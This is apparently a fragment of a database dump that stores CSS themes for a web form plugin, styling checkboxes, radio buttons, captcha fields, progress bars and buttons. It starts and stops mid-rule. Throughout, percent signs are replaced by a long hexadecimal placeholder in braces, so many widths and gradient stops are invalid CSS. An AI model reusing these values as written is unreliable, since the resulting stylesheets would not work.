\"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #FF9A8E;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #FA8072;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #FF8F83; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #F7B4AC 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F89F95 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FF8F83 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F7B4AC), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F89F95), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FF8F83)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #F7B4AC 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F89F95 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FF8F83 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #F7B4AC 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F89F95 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FF8F83 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #F7B4AC 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F89F95 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FF8F83 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #F7B4AC 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F89F95 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #FF8F83 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height: 18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/04/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(13,'Theme 04 dark orange','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #F6CE9D;\r\nmargin-bottom: 10px;\r\ncolor: #F6CE9D;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #E2B983 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	color: #69512F;\r\n	border: 1px solid #D89E5F;\r\n	background: #C8A470; /* Old browsers */\r\n	background: -moz-linear-gradient(bottom, #DFC091 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CFAE7B 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #C19C67 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #AA824E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-linear-gradient(bottom, #DFC091 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CFAE7B 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #C19C67 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #AA824E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(bottom, #DFC091 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CFAE7B 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #C19C67 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #AA824E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(bottom, #DFC091 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CFAE7B 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #C19C67 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #AA824E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to bottom, #DFC091 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CFAE7B 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #C19C67 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #AA824E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	box-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #424242 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\n	color: #69512F;\r\n	border: 1px solid #D89E5F;\r\n	background: #C8A470; /* Old browsers */\r\n	background: -moz-linear-gradient(bottom, #DFC091 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CFAE7B 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #C19C67 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #AA824E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-linear-gradient(bottom, #DFC091 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CFAE7B 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #C19C67 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #AA824E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(bottom, #DFC091 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CFAE7B 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #C19C67 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #AA824E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(bottom, #DFC091 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CFAE7B 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #C19C67 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #AA824E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to bottom, #DFC091 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #CFAE7B 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #C19C67 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #AA824E 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	box-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #F6CE9D;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/01/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\n	padding: 13px;\r\n	text-align: center;\r\nfont-size: 18px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #E2B983;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 10px;\r\n	height: 10px;\r\n	background: #DAA157;\r\n	background: -moz-linear-gradient(bottom, #F8DCB2 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #E7C187 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #E6BE86 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #DAA157 95{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -webkit-linear-gradient(bottom, #F8DCB2 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #E7C187 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #E6BE86 